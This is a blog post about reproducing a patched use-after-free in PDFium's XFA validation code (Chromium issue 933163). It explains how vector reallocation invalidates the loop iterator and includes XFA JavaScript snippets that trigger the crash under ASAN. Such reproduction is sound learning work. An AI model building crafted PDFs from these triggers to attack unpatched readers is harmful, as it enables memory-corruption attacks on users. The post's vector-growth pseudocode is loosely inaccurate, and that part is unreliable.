---
id: 1
title: "Reproduction of PDFium Issue #933163"
subtitle: "Use-after-Free vulnerability on CXFA_FFDocView::RunValidate()"
date: "2020.10.14"
tags: "cve, chromium, pdfium, uaf"
---

# Introduction
I have always wanted to learn exploitation of the Chromium V8 Engine and its components, and this desire actually originally stemmed from CTFs, since there were quite a few CTFs that had pwn questions related to Chromium V8 exploitation. When my supervisor from my internship told me that I could try reproducing a now-patched security vulnerability to learn PDFium, which is Chromium's open-source PDF reader based heavily on Foxit Reader, obviously I jumped straight on the idea.

This was the journey of discovering the source of the bug and making attempts to exploit it.

Link to bug: https://bugs.chromium.org/p/chromium/issues/detail?id=933163

# First Steps
Since the both of us were generally new C++ as well as PDF format and parsing, we had to crash course some elements of C++ as well as figure out how PDFs are handled by a PDF viewer, which made this an interesting ride.

In this bug, there is a Use-after-Free vulnerability on the `RunValidate()`function of `CXFA_FFDocView` class. Let&#39;s take a look at the vulnerable (pre-patched) function.
```cpp
bool CXFA_FFDocView::RunValidate() {

  if (!m_pDoc->GetDocEnvironment()->IsValidationsEnabled(m_pDoc.Get()))
    return false;

  for (CXFA_Node* node : m_ValidateNodes) {
    if (!node->HasRemovedChildren())
      node->ProcessValidate(this, 0);
  }

  m_ValidateNodes.clear();
  return true;
}
```

We can break down the function as follows:

1. Firstly, `RunValidate()` will be called if validation is requested (this can be inferred by finding instances where `RunValidate()`is called.
2. If validation is not enabled, `RunValidate()`returns false and does not run validation script.
3. The for loop iterates through `m_ValidateNodes`(with an iterator), and if a node does not have removed children it would run `ProcessValidate()`on the nodes.
4. `m_ValidateNodes.clear()`is run to destroy all elements of `m_ValidateNodes` to prepare it again for more possible validation.

So, we know that the bug is a UaF, which means that there has to be something in here that somehow frees memory while another object is still trying to access it. Because `IsValidationsEnabled()` shouldn&#39;t affect any read/write data, the problem has to lie within the for loop. The iterator seems to be the only possible source of the problem for a UaF vulnerability.

If we take a look at the patch, we can see that the problem was fixed by calling the move constructor on `m_ValidateNodes` before iterating through it. Bingo, the problem does lie with the iterator. But just how does it work? This was where our lack of C++ knowledge initially gated us from reaching a definitive answer, but once we got to know how vectors were defined, it got a lot easier.

In the simplest terms, vectors, if defined without a starting capacity, would start with capacity 0, then 1, 2, 4... and so on, doubling its capacity every time an object is pushed into it after it has already reached its capacity. When it expands its capacity, it will first copy all data to a temporary store, deallocate the space used by the old vector, malloc a new larger space (2n size) for the expanded vector, then copy all the data back from the temporary store into the expanded vector. Now that we knew vectors&#39; data structure, we could jump back into seeing what exactly was causing the UaF.

# Finding the Vuln Function
First, without digging through the code, I just wanted to check if `ProcessValidate()` pushed into `m_ValidateNodes` potentially. I assumed it did, since:

1. In the patched code there was a comment `// May have created more nodes to validate, try again` after the for loop, which signified that nodes could have been added to `m_ValidateNodes` during `ProcessValidate()`.
2. There was nothing else in the for loop that could have potentially created more nodes to validate, since `HasRemovedChildren()` only returned a variable (0 or 1 in this case) and does not affect `m_ValidateNodes`.
3. `ProcessValidate()` takes in the arg `CXFA_FFDocView* docView`, which means it has access to the concerned `docView` context, meaning it would be able to potentially change member variables of the `docView`.

We then theorized the scenario: if let&#39;s say the vector `m_ValidateNodes` hits its max backing store and `ProcessValidate()` adds a new node to `m_ValidateNodes`.

Then C++ would have to, as mentioned above, do something like (pseudocode)
```cpp
base = m_ValidateNodes.backingstore
for (int i = 0; i < m_ValidateNodes.length; i++) {
  currnode = base[i]
  free(base)
  m_ValidateNodes.backingstore = malloc(newsize)
  m_ValidateNodes.length = newsize
}
```

in order to increase its backing store. This is how a Vector achieves O(1) amortized time for push_back(). This also means that the memory allocated to `m_ValidateNodes` would have now potentially (and most likely) changed.

Because `ProcessValidate()` is called **within** the for loop, which loops through addresses of the current `m_ValidateNodes`, if `m_ValidateNodes` were to have to increase its backing store size, it would mean that the actual pointers in `m_ValidateNodes` would have already changed, but the iterated pointer node in the for loop `for (CXFA_Node* node: m_ValidateNodes)` still pointed to the &quot;old&quot; location of `m_ValidateNodes`, which is now freed. Thus, the iterated node is viewed as a valid variable, but when `ProcessValidate()` is run, it would try to use the faulty pointer (which points to the now-freed space), causing a SIGSEGV.

This leads to UaF and thus potential RCE.

# Confirming the Vulnerability
We have just based the above theory on an assumption. Although the assumption is very well justified, as there is almost no other possible way for `m_ValidateNodes` to have been changed, we still need to confirm that `ProcessValidate()` does add nodes before we move forward. PDFium is part of Chromium, which runs on the Chromium V8 Engine, which always has wrappers upon wrappers, so we had to unravel the function.

`ProcessValidate()` is run on the `CXFA_Node` class, so a quick look at `CXFA_Node.h` reveals that there is indeed a prototype function for `ProcessValidate()` in there that accepts a param `CXFA_FFDocView* docView`, which is the object we want to look at. A quick look at `ProcessValidate()` reveals many functions that are being called, but to narrow down on the correct function we only looked for functions called on `docView`, and there were only 2 instances of this happening:
```cpp
bool bStatus = docView->GetLayoutStatus() < XFA_DOCVIEW_LAYOUTSTATUS_End;
```

and
```cpp
if (script) {
  CXFA_EventParam eParam;
  eParam.m_eType = XFA_EVENT_Validate;
  eParam.m_pTarget = this;
  std::tie(iRet, bRet) = ExecuteBoolScript(docView, script, &amp;eParam);
}
```

We know `GetLayoutStatus()` could not have added or removed nodes as it only returns a flag to compare against `XFA_DOCVIEW_LAYOUTSTATUS_End`. So the answer should lie within `ExecuteBoolScript(docView, script, &Param)`. We take a look at `ExecuteBoolScript()`, and we realized that what `ExecuteBoolScript()` does was to run any validation script attached to the node and return a Boolean on whether the node is valid or not valid.

# Attempting an Exploit
This is where the fun part comes in, with just this knowledge, it was already sort of possible to build an exploit. Because we know that the vector `m_ValidateNodes` was not initialized with a starting capacity (from the header file), we can first assume the use of C++&#39;s default vector capacity allocation: 0, 1, 2, 4, 8, 16…
```cpp
<event activity="docReady" ref="$host">
  <script contentType="application/x-javascript">
    xfa.host.setFocus("my_doc.combox_0.combox");
    var val=xfa.resolveNode("my_doc.combox_0.combox");
    val.rawValue="1";
	xfa.host.setFocus("my_doc.combox_1.combox");
	xfa.host.openList("my_doc.combox_0.combox");
  </script>
</event>
```

This puts 1 node into `m_ValidateNodes` at the start, and calling openList will call `RunValidate()`, with the following validate script on `combox_0`:
```cpp
<validate>
  <script contentType="application/x-javascript">
    xfa.host.setFocus("my_doc.combox_1.combox");
	var val=xfa.resolveNode("my_doc.combox_1.combox");
	val.rawValue="1";
	xfa.host.setFocus("my_doc.combox_0.combox");
  </script>
</validate>
```

What we want is to change a value and add it to `m_ValidateNodes` while validating a node so that `m_ValidateNodes` would have exceeded its current capacity and would thus need to increase its backing store mid-validation.

However, running this did not produce any error:

![](https://i.ibb.co/F73xkTy/1.png)

Hmm, what could be the problem? Let&#39;s try increasing the amount of combo boxes by 1, since we assumed initially that the backing store would be 0, 1, 2, 4…, and it turned out that the backing store didn&#39;t need to increase from 1 to 2, if we have 2 objects initially in the vector and add a third, it would surely have to increase its capacity from 2 to 4 right?

We add a third combo box, `combox_2` with the exact same format as `combox_1`, and instead also modify the value of `combox_1` on docReady event so that `m_ValidateNodes` would have 2 objects before `RunValidate()` is executed:
```cpp
<event activity="docReady" ref="$host">
  <script contentType="application/x-javascript">
	xfa.host.setFocus("my_doc.combox_0.combox");
	var val=xfa.resolveNode("my_doc.combox_0.combox");
	val.rawValue="1";
	xfa.host.setFocus("my_doc.combox_1.combox");
	var val1=xfa.resolveNode("my_doc.combox_1.combox");
	val1.rawValue="1";
	xfa.host.setFocus("my_doc.combox_2.combox");
	xfa.host.openList("my_doc.combox_0.combox");
  </script>
</event>
```

And we modify the validate script of `combox_0` so that it changes the value of `combox_2` instead of `combox_1` so that we add a third node to `m_ValidateNodes` which theoretically should have a backing store of 2.

This time when we ran the pdf through pdfium, we got a SIGSEGV. This is one big step towards success, but we&#39;re not completely in the clear yet.

![](https://i.ibb.co/n08t3My/2.png)

We can see that the SIGSEGV occurs on the function `HasFlag()`, which is a good sign since this function is called inside `ProcessValidate()`, which is called within the exploitable for loop. We load the pdf using pdfium with ASAN enabled, and we get the following:

![](https://i.ibb.co/TkZhGTc/3.png)

Great, we have now reproduced the UaF vulnerability. As a double-check, we load the exploit pdf provided on the bug report in both in gdb and in CLI with asan enabled:

![](https://i.ibb.co/r0tCMRR/4.png)

The SIGSEGV occurred at the same place, with `HasFlag()` having the same arg `this=0x100010001`.

![](https://i.ibb.co/pz1LX0y/5.png)

The address that the UaF occurred on seemed to be different in both PDFs, but that shouldn&#39;t matter because different PDF layouts were used in both PDFs.

This is a graph roughly explaining the logic flow when parsing the exploit pdf:

![](https://i.ibb.co/7k1b24h/6.png)

Thus, we have achieved UaF with the bug in issue #933163.

# Afterword
We still don&#39;t completely understand the inner workings of pdfium because we did not go through the code base thoroughly, and we did do a bit of calculated guessing to be able to land the reproduction of the exploit. There are still a lot of functions where we didn&#39;t know exactly when would be called within the `CXFA_FFDocView` and `CXFA_Node` classes, but we believe we generally understand the cause for this exploit and how we can trigger it.

Thanks for reading.